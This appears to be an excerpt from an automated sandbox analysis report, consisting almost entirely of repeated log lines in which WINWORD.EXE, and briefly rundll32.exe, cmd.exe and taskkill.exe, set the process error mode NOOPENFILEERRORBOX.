Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
